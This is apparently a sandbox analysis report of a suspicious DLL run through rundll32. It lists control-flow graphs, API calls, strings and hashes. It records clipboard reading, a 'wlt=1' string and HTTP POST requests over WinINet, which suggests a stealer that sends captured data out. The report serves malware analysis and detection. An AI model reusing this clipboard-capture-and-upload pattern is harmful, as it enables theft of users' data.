6eb0cefd __dosmaperr 5 API calls 9753->9754 9755 6eb0d03a 9754->9755 9756 6eb0d055 TlsFree 9755->9756 9757 6eb0d043 9755->9757 9757->9750 11280 6eb0db7c 11281 6eb0daab ___scrt_uninitialize_crt 66 API calls 11280->11281 11282 6eb0db84 11281->11282 11290 6eb0fca3 11282->11290 11284 6eb0db89 11300 6eb0fd4e 11284->11300 11287 6eb0dbb3 11288 6eb0b90f _free 14 API calls 11287->11288 11289 6eb0dbbe 11288->11289 11291 6eb0fcaf CallCatchBlock 11290->11291 11304 6eb0b7d4 EnterCriticalSection 11291->11304 11293 6eb0fcba 11294 6eb0fd26 11293->11294 11297 6eb0fcfa DeleteCriticalSection 11293->11297 11305 6eb10155 11293->11305 11318 6eb0fd45 11294->11318 11299 6eb0b90f _free 14 API calls 11297->11299 11299->11293 11301 6eb0fd65 11300->11301 11302 6eb0db98 DeleteCriticalSection 11300->11302 11301->11302 11303 6eb0b90f _free 14 API calls 11301->11303 11302->11284 11302->11287 11303->11302 11304->11293 11306 6eb10161 CallCatchBlock 11305->11306 11307 6eb10180 11306->11307 11308 6eb1016b 11306->11308 11315 6eb1017b 11307->11315 11321 6eb0dbc8 EnterCriticalSection 11307->11321 11309 6eb0b686 _free 14 API calls 11308->11309 11310 6eb10170 11309->11310 11312 6eb099cc ___std_exception_copy 25 API calls 11310->11312 11312->11315 11313 6eb1019d 11322 6eb100de 11313->11322 11315->11293 11316 6eb101a8 11338 6eb101cf 11316->11338 11410 6eb0b81c LeaveCriticalSection 11318->11410 11320 6eb0fd32 11320->11284 11321->11313 11323 6eb10100 11322->11323 11324 6eb100eb 11322->11324 11327 6eb0d9fe ___scrt_uninitialize_crt 62 API calls 11323->11327 11329 6eb100fb 11323->11329 11325 6eb0b686 _free 14 API calls 11324->11325 11326 6eb100f0 11325->11326 11328 6eb099cc ___std_exception_copy 25 API calls 11326->11328 11330 6eb10115 11327->11330 11328->11329 11329->11316 11331 6eb0fd4e 14 API calls 11330->11331 11332 6eb1011d 11331->11332 11333 6eb0dd4c ___scrt_uninitialize_crt 25 API calls 11332->11333 11334 6eb10123 11333->11334 11341 6eb10747 11334->11341 11337 6eb0b90f _free 14 API calls 11337->11329 11409 6eb0dbdc LeaveCriticalSection 11338->11409 11340 6eb101d7 11340->11315 11342 6eb10758 11341->11342 11343 6eb1076d 11341->11343 11344 6eb0b673 __dosmaperr 14 API calls 11342->11344 11345 6eb107b6 11343->11345 11349 6eb10794 11343->11349 11346 6eb1075d 11344->11346 11347 6eb0b673 __dosmaperr 14 API calls 11345->11347 11348 6eb0b686 _free 14 API calls 11346->11348 11350 6eb107bb 11347->11350 11354 6eb10129 11348->11354 11356 6eb106bb 11349->11356 11351 6eb0b686 _free 14 API calls 11350->11351 11353 6eb107c3 11351->11353 11355 6eb099cc ___std_exception_copy 25 API calls 11353->11355 11354->11329 11354->11337 11355->11354 11357 6eb106c7 CallCatchBlock 11356->11357 11367 6eb0effc EnterCriticalSection 11357->11367 11359 6eb106d5 11360 6eb10707 11359->11360 11361 6eb106fc 11359->11361 11362 6eb0b686 _free 14 API calls 11360->11362 11368 6eb107d4 11361->11368 11364 6eb10702 11362->11364 11383 6eb1073b 11364->11383 11367->11359 11386 6eb0f0d3 11368->11386 11370 6eb107ea 11399 6eb0f042 11370->11399 11371 6eb107e4 11371->11370 11374 6eb0f0d3 ___scrt_uninitialize_crt 25 API calls 11371->11374 11382 6eb1081c 11371->11382 11376 6eb10813 11374->11376 11375 6eb0f0d3 ___scrt_uninitialize_crt 25 API calls 11377 6eb10828 CloseHandle 11375->11377 11380 6eb0f0d3 ___scrt_uninitialize_crt 25 API calls 11376->11380 11377->11370 11381 6eb10834 GetLastError 11377->11381 11378 6eb0b650 __dosmaperr 14 API calls 11379 6eb10864 11378->11379 11379->11364 11380->11382 11381->11370 11382->11370 11382->11375 11408 6eb0f01f LeaveCriticalSection 11383->11408 11385 6eb10724 11385->11354 11387 6eb0f0e0 11386->11387 11389 6eb0f0f5 11386->11389 11388 6eb0b673 __dosmaperr 14 API calls 11387->11388 11390 6eb0f0e5 11388->11390 11391 6eb0b673 __dosmaperr 14 API calls 11389->11391 11393 6eb0f11a 11389->11393 11392 6eb0b686 _free 14 API calls 11390->11392 11394 6eb0f125 11391->11394 11395 6eb0f0ed 11392->11395 11393->11371 11396 6eb0b686 _free 14 API calls 11394->11396 11395->11371 11397 6eb0f12d 11396->11397 11398 6eb099cc ___std_exception_copy 25 API calls 11397->11398 11398->11395 11400 6eb0f051 11399->11400 11401 6eb0f0b8 11399->11401 11400->11401 11407 6eb0f07b 11400->11407 11402 6eb0b686 _free 14 API calls 11401->11402 11403 6eb0f0bd 11402->11403 11404 6eb0b673 __dosmaperr 14 API calls 11403->11404 11405 6eb0f0a8 11404->11405 11405->11378 11405->11379 11406 6eb0f0a2 SetStdHandle 11406->11405 11407->11405 11407->11406 11408->11385 11409->11340 11410->11320 11497 6eb0b76c 11500 6eb0b6f3 11497->11500 11501 6eb0b6ff CallCatchBlock 11500->11501 11508 6eb0b7d4 EnterCriticalSection 11501->11508 11503 6eb0b709 11504 6eb0b737 11503->11504 11507 6eb0e0bd __fassign 14 API calls 11503->11507 11509 6eb0b755 11504->11509 11507->11503 11508->11503 11512 6eb0b81c LeaveCriticalSection 11509->11512 11511 6eb0b743 11512->11511

                      Executed Functions

                      Function 6EB01EC0 Relevance: 23.2, APIs: 10, Strings: 3, Instructions: 409networkfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 6eb01ec0-6eb01f1c call 6eb06751 4 6eb01f22-6eb01f26 0->4 5 6eb0242e-6eb02459 call 6eb05d90 0->5 4->5 6 6eb01f2c-6eb01f30 4->6 11 6eb02483-6eb0249b 5->11 12 6eb0245b-6eb02467 5->12 6->5 8 6eb01f36-6eb02053 call 6eb05d90 InternetOpenW InternetConnectA HttpOpenRequestA HttpSendRequestA InternetReadFile 6->8 20 6eb02059 8->20 21 6eb0225f-6eb022c8 InternetCloseHandle * 3 8->21 16 6eb024a1-6eb024ad 11->16 17 6eb023e5-6eb023fd 11->17 13 6eb02479-6eb02480 call 6eb0679f 12->13 14 6eb02469-6eb02477 12->14 13->11 14->13 18 6eb024ef call 6eb099dc 14->18 22 6eb024b3-6eb024c1 16->22 23 6eb023db-6eb023e2 call 6eb0679f 16->23 24 6eb024d2-6eb024ee call 6eb06791 17->24 25 6eb02403-6eb0240f 17->25 36 6eb024f4-6eb024f9 call 6eb06c3c 18->36 30 6eb02060-6eb02067 20->30 27 6eb022ca-6eb022d9 21->27 28 6eb022ff-6eb0231d 21->28 22->18 32 6eb024c3 22->32 23->17 33 6eb02415-6eb02423 25->33 34 6eb024c8-6eb024cf call 6eb0679f 25->34 37 6eb022db-6eb022e9 27->37 38 6eb022ef-6eb022fc call 6eb0679f 27->38 39 6eb02350-6eb02371 28->39 40 6eb0231f-6eb02330 28->40 41 6eb02259 30->41 42 6eb0206d-6eb0209b 30->42 32->23 33->18 45 6eb02429 33->45 34->24 37->18 37->38 38->28 53 6eb02373-6eb0237f 39->53 54 6eb0239f-6eb023b7 39->54 49 6eb02332-6eb02340 40->49 50 6eb02346-6eb0234d call 6eb0679f 40->50 41->21 51 6eb020a0-6eb020a5 42->51 45->34 49->18 49->50 50->39 51->51 58 6eb020a7-6eb0214b call 6eb05d90 * 2 51->58 60 6eb02381-6eb0238f 53->60 61 6eb02395-6eb0239c call 6eb0679f 53->61 54->17 55 6eb023b9-6eb023c5 54->55 55->23 63 6eb023c7-6eb023d5 55->63 70 6eb02181-6eb0219a call 6eb06390 58->70 71 6eb0214d-6eb0217f call 6eb09260 58->71 60->18 60->61 61->54 63->18 63->23 76 6eb021a0-6eb021ad 70->76 71->76 77 6eb021da-6eb021e7 76->77 78 6eb021af-6eb021ba 76->78 81 6eb02218-6eb02223 77->81 82 6eb021e9-6eb021f8 77->82 79 6eb021d0-6eb021d7 call 6eb0679f 78->79 80 6eb021bc-6eb021ca 78->80 79->77 80->18 80->79 81->36 86 6eb02229-6eb02253 InternetReadFile 81->86 84 6eb021fa-6eb02208 82->84 85 6eb0220e-6eb02215 call 6eb0679f 82->85 84->18 84->85 85->81 86->30 86->41
                      APIs
                      • std::_Xinvalid_argument.LIBCPMT ref: 6EB01EC5
                        • Part of subcall function 6EB06751: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6EB0675D
                      • InternetOpenW.WININET(6EB1BA1C,00000000,00000000,00000000,00000000), ref: 6EB01FA7
                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6EB01FCE
                      • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6EB01FF8
                      • HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6EB02031
                      • InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6EB0204B
                      • InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6EB0224B
                      • InternetCloseHandle.WININET(00000000), ref: 6EB02266
                      • InternetCloseHandle.WININET(?), ref: 6EB0226E
                      • InternetCloseHandle.WININET(?), ref: 6EB02276
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                      • String ID: Content-Type: application/x-www-form-urlencoded$POST$string too long
                      • API String ID: 4066372336-370044323
                      • Opcode ID: d520224b9eecfa50f37449d3ddc49150a87d847108f082bf7c6299cdcf5ba21d
                      • Instruction ID: 98460afafbabe98c3bae8bb11b783ae25e77c65d690925e1dbbbf65fe99406fb
                      • Opcode Fuzzy Hash: d520224b9eecfa50f37449d3ddc49150a87d847108f082bf7c6299cdcf5ba21d
                      • Instruction Fuzzy Hash: F0F1D1B05101989FEB24CF68CC84BDDBFB5EF44314F504198E609AB686CB75AAC8CF55
                      Function 6EB031B0 Relevance: 18.0, APIs: 7, Strings: 3, Instructions: 477COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 207 6eb031b0-6eb033a6 211 6eb033a8-6eb033b4 207->211 212 6eb033db-6eb033f7 call 6eb06791 207->212 213 6eb033d1-6eb033d8 call 6eb0679f 211->213 214 6eb033b6-6eb033c4 211->214 213->212 214->213 216 6eb033f8-6eb034f3 call 6eb099dc call 6eb05ed0 call 6eb05d90 214->216 227 6eb034f5-6eb03501 216->227 228 6eb0351d-6eb03530 216->228 229 6eb03513-6eb0351a call 6eb0679f 227->229 230 6eb03503-6eb03511 227->230 229->228 230->229 231 6eb03531-6eb036d1 call 6eb099dc call 6eb05d90 230->231 241 6eb036d3-6eb036df 231->241 242 6eb03734-6eb03750 call 6eb06791 231->242 243 6eb036e1-6eb036ef 241->243 244 6eb0372a-6eb03731 call 6eb0679f 241->244 243->244 246 6eb03751-6eb03823 call 6eb099dc call 6eb05ed0 call 6eb06060 243->246 244->242 257 6eb03825-6eb03831 246->257 258 6eb0384d-6eb0385e 246->258 259 6eb03843-6eb0384a call 6eb0679f 257->259 260 6eb03833-6eb03841 257->260 259->258 260->259 261 6eb0385f-6eb038d5 call 6eb099dc OpenClipboard 260->261 266 6eb03a87-6eb03a99 261->266 267 6eb038db-6eb038ea GetClipboardData 261->267 268 6eb038f0-6eb038fc GlobalLock 267->268 269 6eb03a81 CloseClipboard 267->269 270 6eb03902-6eb03921 WideCharToMultiByte 268->270 271 6eb03a7a-6eb03a7b GlobalUnlock 268->271 269->266 270->271 272 6eb03927-6eb03a50 call 6eb06230 WideCharToMultiByte call 6eb05d90 270->272 271->269 272->271 282 6eb03a52-6eb03a5e 272->282 283 6eb03a70-6eb03a77 call 6eb0679f 282->283 284 6eb03a60-6eb03a6e 282->284 283->271 284->283 285 6eb03a9a-6eb03b6d call 6eb099dc call 6eb05d90 call 6eb05b80 * 2 call 6eb01ed0 call 6eb05b80 call 6eb05d90 call 6eb031b0 284->285
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID:
                      • String ID: +++$abcdefghijklmnopqrstuvwxyz0123456789$wlt=1
                      • API String ID: 0-2251221455
                      • Opcode ID: 10ad944105cd746348be17546ab2d008e0259302a403ed3c073af3d69636ca0f
                      • Instruction ID: 33892bd86366a74b6555ab339c784471e57e73d31917d278b4aab631e31dd4b0
                      • Opcode Fuzzy Hash: 10ad944105cd746348be17546ab2d008e0259302a403ed3c073af3d69636ca0f
                      • Instruction Fuzzy Hash: 5AF10970A10289AFEB04CFA8CC59BDEBFB9EB45724F10461DE411AB7C0DB75A944CB91
                      Function 6EB01ED0 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 386networkfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 90 6eb01ed0-6eb01f1c 91 6eb01f22-6eb01f26 90->91 92 6eb0242e-6eb02459 call 6eb05d90 90->92 91->92 93 6eb01f2c-6eb01f30 91->93 98 6eb02483-6eb0249b 92->98 99 6eb0245b-6eb02467 92->99 93->92 95 6eb01f36-6eb02053 call 6eb05d90 InternetOpenW InternetConnectA HttpOpenRequestA HttpSendRequestA InternetReadFile 93->95 107 6eb02059 95->107 108 6eb0225f-6eb022c8 InternetCloseHandle * 3 95->108 103 6eb024a1-6eb024ad 98->103 104 6eb023e5-6eb023fd 98->104 100 6eb02479-6eb02480 call 6eb0679f 99->100 101 6eb02469-6eb02477 99->101 100->98 101->100 105 6eb024ef call 6eb099dc 101->105 109 6eb024b3-6eb024c1 103->109 110 6eb023db-6eb023e2 call 6eb0679f 103->110 111 6eb024d2-6eb024ee call 6eb06791 104->111 112 6eb02403-6eb0240f 104->112 123 6eb024f4-6eb024f9 call 6eb06c3c 105->123 117 6eb02060-6eb02067 107->117 114 6eb022ca-6eb022d9 108->114 115 6eb022ff-6eb0231d 108->115 109->105 119 6eb024c3 109->119 110->104 120 6eb02415-6eb02423 112->120 121 6eb024c8-6eb024cf call 6eb0679f 112->121 124 6eb022db-6eb022e9 114->124 125 6eb022ef-6eb022fc call 6eb0679f 114->125 126 6eb02350-6eb02371 115->126 127 6eb0231f-6eb02330 115->127 128 6eb02259 117->128 129 6eb0206d-6eb0209b 117->129 119->110 120->105 132 6eb02429 120->132 121->111 124->105 124->125 125->115 140 6eb02373-6eb0237f 126->140 141 6eb0239f-6eb023b7 126->141 136 6eb02332-6eb02340 127->136 137 6eb02346-6eb0234d call 6eb0679f 127->137 128->108 138 6eb020a0-6eb020a5 129->138 132->121 136->105 136->137 137->126 138->138 145 6eb020a7-6eb0214b call 6eb05d90 * 2 138->145 147 6eb02381-6eb0238f 140->147 148 6eb02395-6eb0239c call 6eb0679f 140->148 141->104 142 6eb023b9-6eb023c5 141->142 142->110 150 6eb023c7-6eb023d5 142->150 157 6eb02181-6eb0219a call 6eb06390 145->157 158 6eb0214d-6eb0217f call 6eb09260 145->158 147->105 147->148 148->141 150->105 150->110 163 6eb021a0-6eb021ad 157->163 158->163 164 6eb021da-6eb021e7 163->164 165 6eb021af-6eb021ba 163->165 168 6eb02218-6eb02223 164->168 169 6eb021e9-6eb021f8 164->169 166 6eb021d0-6eb021d7 call 6eb0679f 165->166 167 6eb021bc-6eb021ca 165->167 166->164 167->105 167->166 168->123 173 6eb02229-6eb02253 InternetReadFile 168->173 171 6eb021fa-6eb02208 169->171 172 6eb0220e-6eb02215 call 6eb0679f 169->172 171->105 171->172 172->168 173->117 173->128
                      APIs
                      • InternetOpenW.WININET(6EB1BA1C,00000000,00000000,00000000,00000000), ref: 6EB01FA7
                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6EB01FCE
                      • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6EB01FF8
                      • HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6EB02031
                      • InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6EB0204B
                      • InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6EB0224B
                      • InternetCloseHandle.WININET(00000000), ref: 6EB02266
                      • InternetCloseHandle.WININET(?), ref: 6EB0226E
                      • InternetCloseHandle.WININET(?), ref: 6EB02276
                      Strings
                      • POST, xrefs: 6EB01FF2
                      • Content-Type: application/x-www-form-urlencoded, xrefs: 6EB01F71
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                      • String ID: Content-Type: application/x-www-form-urlencoded$POST
                      • API String ID: 1354133546-2387545335
                      • Opcode ID: 3a39a2de1be8b3ee9d76acc5d222ca0f41c7a19cd69c5d903c527bc391ba9f14
                      • Instruction ID: c6d4c285205ff4b868b56fd5896807c1fef63540ee74febecf16126242591acc
                      • Opcode Fuzzy Hash: 3a39a2de1be8b3ee9d76acc5d222ca0f41c7a19cd69c5d903c527bc391ba9f14
                      • Instruction Fuzzy Hash: 4AF1E2B06101589FEB24CF68CC84BDDBFB5EF44314F5041A8E609AB686CB75AAC8CF55
                      Function 6EB06E7A Relevance: 10.6, APIs: 7, Instructions: 138COMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • __RTC_Initialize.LIBCMT ref: 6EB06EC1
                      • ___scrt_uninitialize_crt.LIBCMT ref: 6EB06EDB
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: Initialize___scrt_uninitialize_crt
                      • String ID:
                      • API String ID: 2442719207-0
                      • Opcode ID: a50f439caa825ec316ddd10c37158a6fa7f68c2b723d99c2cc13db2f53464c6e
                      • Instruction ID: 51f75abeffbb517fb0fcf4843f6f0159dad2e37820d6acff6a5ddc3b925f8a92
                      • Opcode Fuzzy Hash: a50f439caa825ec316ddd10c37158a6fa7f68c2b723d99c2cc13db2f53464c6e
                      • Instruction Fuzzy Hash: B0412672D302E9AFDB209FD4CC40BDE7E78EF417A4F10491AF81467A94D770AA418BA0
                      Function 6EB06F2C Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 353 6eb06f2c-6eb06f3d call 6eb073b0 356 6eb06f4e-6eb06f55 353->356 357 6eb06f3f-6eb06f45 353->357 359 6eb06f61-6eb06f75 dllmain_raw 356->359 360 6eb06f57-6eb06f5a 356->360 357->356 358 6eb06f47-6eb06f49 357->358 364 6eb07027-6eb07036 358->364 362 6eb06f7b-6eb06f8c dllmain_crt_dispatch 359->362 363 6eb0701e-6eb07025 359->363 360->359 361 6eb06f5c-6eb06f5f 360->361 365 6eb06f92-6eb06fa4 call 6eb06640 361->365 362->363 362->365 363->364 368 6eb06fa6-6eb06fa8 365->368 369 6eb06fcd-6eb06fcf 365->369 368->369 370 6eb06faa-6eb06fc8 call 6eb06640 call 6eb06e7a dllmain_raw 368->370 371 6eb06fd1-6eb06fd4 369->371 372 6eb06fd6-6eb06fe7 dllmain_crt_dispatch 369->372 370->369 371->363 371->372 372->363 374 6eb06fe9-6eb0701b dllmain_raw 372->374 374->363
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: dllmain_raw$dllmain_crt_dispatch
                      • String ID:
                      • API String ID: 3136044242-0
                      • Opcode ID: e033e78456e5a113dbd0466bf413a4851cf475704c8cf9dcb633048f3c736815
                      • Instruction ID: 53f2a2c2050b1ffc257206cd73bc95c1226422f3bdf79aa39f0df61a2ee00cd7
                      • Opcode Fuzzy Hash: e033e78456e5a113dbd0466bf413a4851cf475704c8cf9dcb633048f3c736815
                      • Instruction Fuzzy Hash: D621B1719202AAAFCB219FD4C940AAF7E6DEF80794F014615F8146B654D770AE818BE0
                      Function 6EB0B423 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • GetLastError.KERNEL32(?,?,00000001,6EB0B68B,6EB0B935,?,?,6EB0AB0E), ref: 6EB0B428
                      • _free.LIBCMT ref: 6EB0B485
                      • _free.LIBCMT ref: 6EB0B4BB
                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000001,6EB0B68B,6EB0B935,?,?,6EB0AB0E), ref: 6EB0B4C6
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: ErrorLast_free
                      • String ID:
                      • API String ID: 2283115069-0
                      • Opcode ID: 2a306f356bbc4b912186c817ff11e32600f58cd7f9701e313d5d6adbe03477a2
                      • Instruction ID: 814a0ccb8468b6300e979314ab43e89db59cca3d3d0eab050f4da3b9875d4bb8
                      • Opcode Fuzzy Hash: 2a306f356bbc4b912186c817ff11e32600f58cd7f9701e313d5d6adbe03477a2
                      • Instruction Fuzzy Hash: 6D1140316245826FDB405AF55CD6F9F2D5DDBC23787240D28F528935D8EF20EE014121
                      Function 6EB06D73 Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • __RTC_Initialize.LIBCMT ref: 6EB06DC0
                        • Part of subcall function 6EB07490: InitializeSListHead.KERNEL32(6EB1F718,6EB06DCA,6EB1C7B0,00000010,6EB06D5B,?,?,?,6EB06F85,?,00000001,?,?,00000001,?,6EB1C7F8), ref: 6EB07495
                      • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6EB06E2A
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                      • String ID:
                      • API String ID: 3231365870-0
                      • Opcode ID: 8ff62b332a3827febdf70d9370ab7d13f03164b3282aadbcfe3b60ca3d8bf404
                      • Instruction ID: de299be35e08db587c77f3771d63ee25ed15fcb95f6418fdb2ff57efdceefd65
                      • Opcode Fuzzy Hash: 8ff62b332a3827febdf70d9370ab7d13f03164b3282aadbcfe3b60ca3d8bf404
                      • Instruction Fuzzy Hash: 7D21F0325383D59EEB45ABF4E9107DC7FA5EF1233DF10485AD9806BAC9CB627080C662
                      Function 6EB0EEAE Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 455 6eb0eeae-6eb0eebb call 6eb0b8b2 457 6eb0eec0-6eb0eecb 455->457 458 6eb0eed1-6eb0eed9 457->458 459 6eb0eecd-6eb0eecf 457->459 460 6eb0ef1c-6eb0ef28 call 6eb0b90f 458->460 461 6eb0eedb-6eb0eedf 458->461 459->460 462 6eb0eee1-6eb0ef16 call 6eb0d0de 461->462 467 6eb0ef18-6eb0ef1b 462->467 467->460
                      APIs
                        • Part of subcall function 6EB0B8B2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6EB0B46E,00000001,00000364,00000006,000000FF,?,00000001,6EB0B68B,6EB0B935,?,?,6EB0AB0E), ref: 6EB0B8F3
                      • _free.LIBCMT ref: 6EB0EF1D
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: AllocateHeap_free
                      • String ID:
                      • API String ID: 614378929-0
                      • Opcode ID: 5f52aec67efb57151ddd9cf007e78782c2d025e2ddda8bab545638a33767c9fe
                      • Instruction ID: ea3ed396f886b26362cc231fc0e862331ba6cba5babd54d0a58a273c0f5b6753
                      • Opcode Fuzzy Hash: 5f52aec67efb57151ddd9cf007e78782c2d025e2ddda8bab545638a33767c9fe
                      • Instruction Fuzzy Hash: 5A01D67261435A6BD7218FA8D8819CEFFA8EB053B0F140669E555A76C0E370B911CBA0
                      Function 6EB0B8B2 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 468 6eb0b8b2-6eb0b8bd 469 6eb0b8cb-6eb0b8d1 468->469 470 6eb0b8bf-6eb0b8c9 468->470 472 6eb0b8d3-6eb0b8d4 469->472 473 6eb0b8ea-6eb0b8fb RtlAllocateHeap 469->473 470->469 471 6eb0b8ff-6eb0b90a call 6eb0b686 470->471 477 6eb0b90c-6eb0b90e 471->477 472->473 474 6eb0b8d6-6eb0b8dd call 6eb0e4b3 473->474 475 6eb0b8fd 473->475 474->471 481 6eb0b8df-6eb0b8e8 call 6eb09eaa 474->481 475->477 481->471 481->473
                      APIs
